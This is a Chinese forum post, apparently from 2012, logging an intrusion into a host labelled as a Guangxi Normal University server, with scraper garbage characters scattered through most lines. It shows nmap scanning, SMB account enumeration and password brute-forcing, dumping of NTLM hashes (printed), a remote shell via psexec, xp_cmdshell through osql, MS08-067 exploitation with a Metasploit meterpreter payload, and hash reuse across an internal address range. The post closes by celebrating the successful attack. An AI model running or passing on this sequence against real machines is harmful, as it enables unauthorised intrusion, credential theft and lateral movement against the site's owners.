广西师范网站http://202.103.242.241/! x5 K. d8 k5 p4 h) y7 p6 O) r, u
u" a5 J' Y0 H0 M2 I, {! }root@bt:~# nmap -sS -sV 202.103.242.241, d# ]& Q( x4 z/ n! d/ e& c
6 F. f6 N+ _" a' }9 N% d7 jStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST4 k2 P! X) s5 H' Z
5 E/ N! h9 c; H' K$ t, l) a
Nmap scan report for bogon (202.103.242.241)/ i# a J5 @8 n2 m% k5 l
; W! \6 W. k; S* B# s) ]8 }
Host is up (0.00048s latency).
7 ]1 n; D) b; j5 m$ t7 y* I& R2 [8 B
Not shown: 993 closed ports
8 k- e3 D- |2 j% Y, ? y- R
/ ~- P6 n" V8 P5 N( Y* G) PPORT STATE SERVICE VERSION1 N' {8 r$ E! {6 p1 v3 J3 w
, w5 g( } `0 t) l5 o; ]( X- n
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
$ \3 S$ Z& C0 F5 d! _7 W
3 q o' t( n* o9 d% a, b8 H2 n9 Q C139/tcp open netbios-ssn
+ ~: d& `% e9 |, l: i. Q
; T7 y' ?% Y6 Z) X' c% ~445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
& S7 |$ M9 Z3 J5 W6 x, W+ c6 e5 z9 F" i
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)% Y* g0 z, d5 f" `4 J' c
$ J# A9 w5 l! K, |, w2 G# T1026/tcp open msrpc Microsoft Windows RPC
/ e8 m" N! @3 E
; O$ j0 A* a$ ]0 Q* [- L3372/tcp open msdtc?
& V8 o; c' V* }3 c) b0 e% y& y2 l6 j" o
3389/tcp open ms-term-serv?+ ~* R3 z" j' J( W7 v* ]
8 r* L- @9 q( C
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :3 S5 s. u/ [9 k2 A- m' V6 w0 q; l
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
5 {. D8 g( g: w2 E, f; Q/ w, A# ]
; [" p3 c% G" q+ [$ M9 YSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions5 |6 J( M, v* V( f) m9 E! }1 U# R: o
/ h7 P" L1 M+ u! dSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)# W) c* {0 h7 F5 D# o6 T
# V1 k; n6 @1 v' a' u9 u5 GSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
A8 P8 u4 K9 p. [0 \9 X/ m) }7 D% \4 i+ ~0 c
SF:ptions,6,”hO\n\x000Z”);
& f6 f( K4 @( F; s( v
8 T3 O- K+ x+ k( G) _% l+ H6 {' Z0 qMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems); _# L; i. m* N: c6 p: i# N8 _
9 z5 Y! o. t& o5 o( T6 C7 P5 X
Service Info: OS: Windows
# u! P6 |/ j" W/ O2 ~; I3 \& _
/ e. p: x! X, @Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .8 w/ u: L! }6 k; X6 B# I7 `+ N9 T6 D, p
) z/ _" e. ~+ ?$ u$ l/ S2 x; ~Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds0 H7 d3 E& H# r {; L$ K# p& {1 C
# t: k1 D% J3 \- ~/ [3 f; O5 oroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本$ z% D) ?! D/ R) `9 D5 S, @
+ R, s1 K9 t- `
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
( z6 M6 h6 e) P) `: X( D' s" J4 |6 K7 C5 h
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
1 g% n# Y2 p8 q6 X2 m2 y7 T# m# @- M8 Y
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
: B n, x( @9 C1 t0 E" [4 k* L5 ]4 ^/ m! G# Z* b- t
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
5 ]. O0 X4 G8 N' Z4 `1 w* F9 B. `
& n8 `8 k/ H0 N-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse9 D/ } a Z6 d$ Q* k
' b8 c3 r! B: c7 Y% |( E% [3 s-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
0 g" d. b' Q. B Z0 E4 C! G: x w
, }, Z$ `& P5 [. Q4 g- Y5 q-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
) e l. K% `! A3 d7 V4 f2 d) a% q, o1 ?9 s9 `" P* P# o
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse! g$ [' p9 }6 d+ ~$ @; Z# ^
9 X7 O/ |- c4 Y-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse; @6 ]* V* c4 w6 q+ u# h5 ^
2 h5 I3 ?7 ?$ l3 J
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
/ H) w' F; \; q' {
3 b0 \6 f4 H2 V3 Y: G! ], O-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
8 m3 J2 R/ n6 |& E2 W+ W! R& w0 B h( Q8 @( K& k+ J$ L
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
" x9 z Z, F0 j# d% g2 K9 b' q2 N; ~, O5 {" i+ T4 D' T5 }" R
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse7 ~2 M) b: {" ]/ D
* c/ |$ O8 S2 f" W-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
/ _4 [% V: ~4 p7 n. ?! \
+ L8 F$ r3 n* C/ I4 {5 s& c-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
4 v1 F1 A- q6 ^& `9 L$ }
) _; O* T, l5 j& zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
3 M' O* d% Q# H9 T% h& Y* r, ]" e6 H( B: X( G; q, |6 _% x
//此乃使用脚本扫描远程机器所存在的账户名: F" K" B6 h2 n) u& Y( T
' I3 d6 s+ |: [
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
7 Q# A2 j" |, Y1 d0 C$ y6 \! \/ J5 s0 _; @1 I1 U9 F8 u
Nmap scan report for bogon (202.103.242.241)
0 D8 Q! E5 z3 M, q6 P" t, M+ _! w& y2 }9 H d
Host is up (0.00038s latency).& F: r# U) b+ t6 B! B [# p9 B
) s& q/ w7 F" n. eNot shown: 993 closed ports4 H/ }! _9 s+ r! {) q1 P
0 k8 }8 a6 Y! KPORT STATE SERVICE
5 r9 x" p0 u: g) j
9 ^+ r; Q" l1 H G% X: {135/tcp open msrpc, a% Y/ V% `$ U, g8 I
" k- T8 {+ S- Q, R: M$ ]
139/tcp open netbios-ssn
0 Z1 ?% \) {( N% N8 }2 K$ r: ?
445/tcp open microsoft-ds
* ^) Z% ?9 {$ t6 G* U8 r/ v0 C9 B9 ]! f' G" C/ _) A) H
1025/tcp open NFS-or-IIS- \4 z% ~3 b) e/ `9 ^( n
5 F0 ? T& M9 L( P. H5 I+ K2 B, H1026/tcp open LSA-or-nterm
" p& F& Q1 }: d, N" J0 ^. j: K4 ]' D. q$ l, \2 S# ]
3372/tcp open msdtc
$ j# `( x, I5 F* A* W: i
$ R! M" o6 L W' p3389/tcp open ms-term-serv- S8 d) C/ n! e8 c8 W
1 J2 }; v: C, L6 Z' W9 Z8 ?MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& z2 t3 b4 Q0 L8 r/ p
2 ?8 L1 \0 N: _8 U, v9 W6 yHost script results:
* _4 r6 F# k( @6 v
6 ]8 Q6 d9 U* ]* _% o| smb-enum-users:9 L1 J+ L9 Z) [' n
( @2 R, }( A1 k' o B' P% p& e
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果6 V! q! P6 f) `* D! q2 h2 v* Y
8 e) U6 e' E) u) o7 u
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds d9 }1 _4 M+ n' E7 C, a1 Q3 z: B/ D. @
# I7 o' j' U) P; d' @9 R8 _
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 * ^, O# @, |# P# _$ E' [$ @; a
# C9 E! z) R% n3 u4 S- | X//查看共享
/ E! I$ y% B! u( M* O3 i
6 W; @ J. |2 h3 V0 IStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
8 l. D" \2 P8 M, K7 J+ C1 C/ C4 d9 a- I' w3 |
Nmap scan report for bogon (202.103.242.241)+ ~* f) R# U7 I* |. p9 M) \
/ m0 ~4 d5 u+ C o' W( n# \( gHost is up (0.00035s latency).; f$ ]% N; n' Q% M! Z* l
8 d ?7 G3 q z( }. I" V( C
Not shown: 993 closed ports
* K6 o$ |5 O" k* D5 U! n) v- D* D0 f3 E
PORT STATE SERVICE9 U R" M0 e0 j4 v) v
! T! T( |+ R# l. ?
135/tcp open msrpc; [4 {& r' Y3 O; X4 l4 {4 H
' b4 H G# J9 r/ C6 N# l139/tcp open netbios-ssn& W# X; Z2 G* r$ B8 A
; S7 X0 _1 ]* J3 K445/tcp open microsoft-ds
! t% x, R- R2 b. x9 \& n1 @$ C
3 }& c7 k) t9 n3 X% R1025/tcp open NFS-or-IIS- P% o4 C7 [, b* I
$ r( z t" ]- S1026/tcp open LSA-or-nterm* y5 T# f3 a( n T! Z9 q- r1 `! d
* e: C( E5 o5 t2 Y3372/tcp open msdtc) S6 z" B( R2 u+ R
5 {. ]* X1 ?: a& {/ K, p& `6 C
3389/tcp open ms-term-serv2 ]+ u9 n$ y# s, g. v
' ^& N1 A5 o; |) RMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ [' }' c1 c, N# N+ t$ o
4 l7 G- v _9 m/ FHost script results:
; O8 a& G2 P# ~2 Q/ a) F1 M
, [) r- y/ [( b, l| smb-enum-shares:. U, ^( E! |# H z' p+ U4 b
x2 R# y' ^$ a$ \
| ADMIN$9 H- u+ S6 K3 ~
7 {' j) L- C& E x; O- A& w| Anonymous access: <none>! n( O! Q( f, @+ t" q
3 b, k% W$ w* @# _: u4 d& a
| C$# q- _1 q- R- X4 B* n
# o; V' A( r) j: }0 C| Anonymous access: <none>
* R z* q3 L' A4 K1 D2 e G+ {* z9 [ X
| IPC$
4 K) I' v) H6 J8 @3 a
( B* z; w7 q4 w- u|_ Anonymous access: READ
. d8 U( j/ X( e. W" E, q o: k- [% W6 B, K
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds2 I7 C0 C: x( X( O$ U
/ n% e* A$ R+ b% H% m1 z6 E# F, Qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
a8 e: F0 L9 {5 ~! b: [7 X* h; N" k: H6 ]2 M' x+ X
//获取用户密码
$ J# y5 S( Y4 v0 Y* F% y& c5 d8 d7 c# D. e3 d
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
. m$ m. u3 K) Z8 H4 a* e( J! i
% f! q3 v$ Y2 g' R2 |, W7 hNmap scan report for bogon (202.103.242.2418)
1 h# O9 |6 K7 ^8 N' B4 y9 i, @) Y; M9 |
Host is up (0.00041s latency).# w$ F7 W E7 U) |# i
) n) }6 R! ^. C: v1 QNot shown: 993 closed ports7 \0 x2 @" l2 u b' j
2 t6 f8 y) {5 R0 X$ o8 ~0 k
PORT STATE SERVICE
/ p: G& d. b8 ~/ m
5 G3 ^1 c2 _6 b6 }$ ~2 Z135/tcp open msrpc/ J; _( Y) K5 w+ x& E* ?7 D) h
! ^4 m3 ~7 R9 r! C- _" H, k
139/tcp open netbios-ssn# j3 _9 ~& [) W' L
: }6 a$ D6 n$ S+ d445/tcp open microsoft-ds+ K/ ?3 r0 S( z% y1 e" i: C2 I9 r
' T3 _- Z* a! G' ~) ~1025/tcp open NFS-or-IIS
H4 b, Q; \9 y2 Z* V- `' x% X9 i7 G5 |
1026/tcp open LSA-or-nterm4 @1 g( ^# u1 V% s2 T, y
" L1 `4 g8 G% g- W3 B& C% o9 g
3372/tcp open msdtc, v; f' Z3 N9 i z- T5 w% ^4 l
. [8 v. S8 z: N3 w' E- i x
3389/tcp open ms-term-serv6 l4 J" b8 j: F
( B/ p" i4 \3 i. B, K
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ ~; p; n6 v& \% I2 Y
* Q7 S* i. O. p% {4 }+ l, m' PHost script results:
& t7 C( q) Q$ u4 b, Y9 Y# {- K/ l5 Z! p! c" R5 h0 _
| smb-brute:' Y7 j* @/ w8 t# h
) {) L" W$ D7 |5 L$ Nadministrator:<blank> => Login was successful
$ V$ [9 n6 Q0 ^" }8 G: K. Q- h5 @) f2 `% P# F! {1 X* N! {
|_ test:123456 => Login was successful
9 ]; N3 r) ~5 H6 a& J
! U9 o* O$ d. t# X2 _* _Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
0 r2 X9 C% u. U5 Q# s1 u
8 F. \2 r W* p, K: Y! mroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash- e5 o0 i9 \7 l" Q/ F9 O8 Z1 n
1 F: |2 n5 l9 _* c% B' k
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data3 E# X6 l! y/ D& \
" E1 {& O/ R _( hroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
' e+ I0 T5 ~; y6 V) ~
3 d3 \1 k1 Z0 g0 H3 A* [5 Uroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139( d6 z5 N9 @; k$ p: H, }. I
& g, S- i: k( x+ v2 J; EStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
; j- H! y1 N1 @. V
. ]8 h6 B+ C |0 | z4 lNmap scan report for bogon (202.103.242.241)
% v) }2 N, f5 e1 u0 f; A3 e9 K/ w0 @* L, K; R1 y
Host is up (0.0012s latency).
8 I$ C9 {& `/ z8 a1 h- v' v; f$ e
, X+ A) B) H1 {2 x/ mPORT STATE SERVICE9 T% c+ W% u7 o: q7 z9 v, d
/ a0 y+ c: G6 [5 l- L* l6 t
135/tcp open msrpc
& H1 `2 ?0 s# U' o: s' j0 \& d2 O! L3 T% c* p; z' V
139/tcp open netbios-ssn6 [: g& Y1 R6 C2 j5 m
) G+ @! ]0 f; G+ y! V
445/tcp open microsoft-ds
" @, o( ], k1 A y' N4 R- V6 d- W( ?- a5 z: J
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% J- ~4 p3 O6 s+ g* h
8 Q8 J, }$ g: w& I t9 G
Host script results:
2 G# {$ A4 R; S: s1 J6 ]9 \. g' r' u' h
| smb-pwdump:
3 g7 r) k5 [+ ]+ ^- a7 q) w W) v* l8 T
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************8 V, d8 t; O+ q( }; d
x4 L0 L* f" F
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************( N/ \0 B. E! k, d: @8 x
. |8 U* R( W: B2 h| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
" p/ ]% Z- [, b
) ?: _7 |& G1 ]$ l9 T% j( S/ \& A|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
) s6 f) k- n8 w; [* W- @3 n
! I" ]$ K! E' m% V* x% qNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
1 E4 I. s: g5 j
2 m1 w$ p- B' J7 u; jC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell3 g; T! N3 @; A4 `. m7 k* a' ^1 W
! n7 [9 [' b4 E1 m9 k. C* }-p 123456 -e cmd.exe# l' F2 j( r1 \8 N
$ K& }9 e" U0 F, a
PsExec v1.55 – Execute processes remotely+ F8 G) E6 N) x: A( j3 F6 y3 O2 P
/ D) v8 v, m6 t# |2 `1 A' TCopyright (C) 2001-2004 Mark Russinovich
$ ?! K8 L( h) d4 P4 \6 |! ?% s9 n6 R% a" v
Sysinternals – www.sysinternals.com8 N% V7 w; A% W) \8 T- U" k
4 ^ C8 ~" K5 oMicrosoft Windows 2000 [Version 5.00.2195]2 F1 P$ @3 t3 y+ b8 v9 Q
, x4 z) S+ `8 {9 |(C) 版权所有 1985-2000 Microsoft Corp.
* T M1 q$ N5 o1 D ^' D7 h. Q/ f3 V) }. H2 B; y( B
C:\WINNT\system32>ipconfig
7 C$ c" v+ @; Q. X1 b) ?5 g) W% H: v. _
Windows 2000 IP Configuration- I- Z8 Z+ @% B
! i0 _/ P5 X/ o$ z4 x+ f4 L
Ethernet adapter 本地连接:6 Z' u8 Q l8 j1 N
: i& u9 [5 j: V( I; d( yConnection-specific DNS Suffix . :
5 a9 W' t% \, t+ E- }: t' X, }7 Y$ P
IP Address. . . . . . . . . . . . : 202.103.242.241# l, H9 k6 s1 N3 S/ \
2 _( G1 j4 P! W% c0 l: c- ESubnet Mask . . . . . . . . . . . : 255.255.255.0
$ y3 V* I2 e; _& ^9 Y0 \ ]4 Y8 O
# }0 ^' L5 c% U7 p; h4 J& Z" p' RDefault Gateway . . . . . . . . . : 202.103.1.1
7 u9 s6 f( O) I: Y
! U# ^/ O0 r1 Z, z1 R3 q2 S! k* uC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
% o J* H0 R D8 m
/ r/ {4 x3 R5 ~6 I, iroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞6 w' O+ d4 ~: q9 Z
M- c7 K- a! v% l
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST3 {- @2 q! y! M r) [5 f
+ j4 \" x) [6 D/ e$ P5 B
Nmap scan report for bogon (202.103.242.241)
9 a" B9 I9 r+ Q" L* B p" s7 K: `) _ {+ [0 j
Host is up (0.00046s latency).% K4 e4 `6 _8 J2 K1 I
0 J! R% A: U! n- V1 m0 L2 k& N
Not shown: 993 closed ports' C- a' U& n& n
* l- F; c2 n; }6 S" ?PORT STATE SERVICE
\" P! }, D: W. l9 q
' x+ J1 P$ h) c135/tcp open msrpc
: q3 E% F, S, l3 a( g5 J* j. }1 C: {3 ~9 W ~, e) {
139/tcp open netbios-ssn
' L" s% \4 E5 O; s% C$ k; H( W8 {3 }
$ V' j/ U/ \ V0 z" G4 K0 m445/tcp open microsoft-ds
2 F& j$ r j/ G& F0 n; z. l$ S$ W; U8 e) W0 w1 r$ v
1025/tcp open NFS-or-IIS
4 W; T! g$ V1 Q9 C- T1 y& K
/ l: u# ]6 ?" l* g& Y% p1026/tcp open LSA-or-nterm0 F! R; P1 ]" r- u5 |
) c9 B2 f* k. Y8 Z" I; @
3372/tcp open msdtc" W* j; y/ v- ]+ k
9 R: H" J9 i% T3389/tcp open ms-term-serv- T6 c. ?( k* U* N y& \" c# i
) e5 x9 J3 I5 K0 J! a: l! O) H
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
7 v1 i5 u& C }. p! ` R0 ^* \2 n; ^& f1 [! q2 ?7 d6 H! c
Host script results:
# Z: X, g- x# r. ~* K
& {2 U, `' Y4 g| smb-check-vulns:
' m- `& `' Y6 [/ ]; a6 `* S5 _- Y" S0 k/ c
|_ MS08-067: VULNERABLE, e. t4 |# V" P7 c, ]
6 k0 o6 n; I' s6 x: O$ p
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
. s* F& \6 `+ ]( O
1 F+ A4 [0 L5 w* Z0 Aroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
# ^) t: N. Y! \
3 |7 }# H$ W9 u* Y/ o+ M, qmsf > search ms089 {: @& `( }+ _ z; O- X
! o# T# _ q" x2 r9 a# f' `msf > use exploit/windows/smb/ms08_067_netapi
2 S. u h* M8 j( E6 H$ l; ^3 C' z @9 r; ]* H
msf exploit(ms08_067_netapi) > show options
6 S; V0 \, g; p- F! a- x2 D
. G* g+ e" [6 Q s+ s! fmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241, L( b4 s. G5 T; }
. }+ P# q& D5 ]. P2 H3 ~msf exploit(ms08_067_netapi) > show payloads3 _" i8 n1 W1 {6 ^# O3 e/ f
( Z! ?, I. B# b% `* X: rmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp# m1 t1 |6 q: M+ o
+ A* k* h& R( W0 G; i8 U
msf exploit(ms08_067_netapi) > exploit
# b5 [( J8 ^2 `
& a4 l5 Z1 ?: B$ I$ d1 xmeterpreter >* x, C% x* s, v
7 E6 Q0 q2 L5 t' N5 D' cBackground session 2? [y/N] (ctrl+z)/ t, z5 z" Z8 p* ]5 E3 M6 H9 d" z
- J. y% N' k! c( _/ w
msf exploit(ms08_067_netapi) > sessions -l: e1 y1 F8 k6 k- ~9 l0 [; w
' V; C5 h. @+ l" z# r4 w/ F6 g
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt4 @2 ~* L6 c B; I2 k
. `6 M+ p0 `: [ Jtest. E5 r) p- i) N: a- b# _6 b
( E+ W7 ^0 S& T3 u, n* T
administrator) _# Q- n% {4 @- V% M
0 [: M4 ?. R) r7 |; \- o6 }
root@bt:/usr/local/share/nmap/scripts# vim password.txt; v" i# u. O M8 g# h' b
7 V% e" e _3 ^7 S44EFCE164AB921CAAAD3B435B51404EE q/ e/ \" t8 w* _
H9 X# G6 |+ S/ j( g7 ^
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
: h2 H9 [8 @( A; }1 f8 j+ n
L( G3 E& n- X //利用用户名跟获取的hash尝试对整段内网进行登录
5 p* M+ n- }) _" p3 A% p' I- p* ]" c( Q7 G* z! |; N
Nmap scan report for 192.168.1.1050 Z! v5 Q% Y* e7 u! A, y2 d
5 }8 S8 h) J$ o: d: M' p! n
Host is up (0.00088s latency).
+ X7 I% a" P+ b8 P) l e. m6 S- Y5 X. y' O, ^
Not shown: 993 closed ports3 [1 b& x" h9 ~. ~0 ^
1 K7 ^6 G) l( e" Y1 x T
PORT STATE SERVICE
1 u; y/ G4 Z$ q( f8 Q5 M7 e# @
135/tcp open msrpc
" Z$ V# ~" w$ E; U% c9 V: q) X6 s: m: L. s
139/tcp open netbios-ssn u1 j( _( A. `, v7 \1 h6 f
0 d" ~7 Z4 M, Q" j; j" B J& D445/tcp open microsoft-ds% F& ^$ n k1 P+ k9 L/ o
1 ^* m( S, }7 x9 o+ ^
1025/tcp open NFS-or-IIS: e* s+ c% _( S3 w5 @
4 L# U- w* T) o" m( |
1026/tcp open LSA-or-nterm
7 q& X: C7 w) i* Z% U
% _" O, i$ j. q3 N5 X3372/tcp open msdtc
) R" h" O: k& ]: i( C
5 K7 V( ], } Y X+ n9 B$ a3389/tcp open ms-term-serv
9 j0 f) M& R* S2 m2 G. @$ S. o0 o& s/ U1 E, z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' L6 p, ^5 m% d, E; p4 y* a
5 w" p; k2 j7 O( D, aHost script results:& f: ]; i/ n1 L# e% O6 i
" }' d( u+ {1 Q7 ~' q
| smb-brute:% v4 C% S) g: r9 U9 V
% Q& o3 R0 x) n& n# O6 M
|_ administrator:<blank> => Login was successful+ s* Z9 z$ R a4 L$ s
2 A& Q. _, l+ e4 E* C& C
攻击成功,一个简单的msf+nmap攻击~~·
. v& X+ a' J2 E4 T" W7 M) {! D( x0 z m
|
发表于 2012-12-4 12:46:42
收藏
支持
反对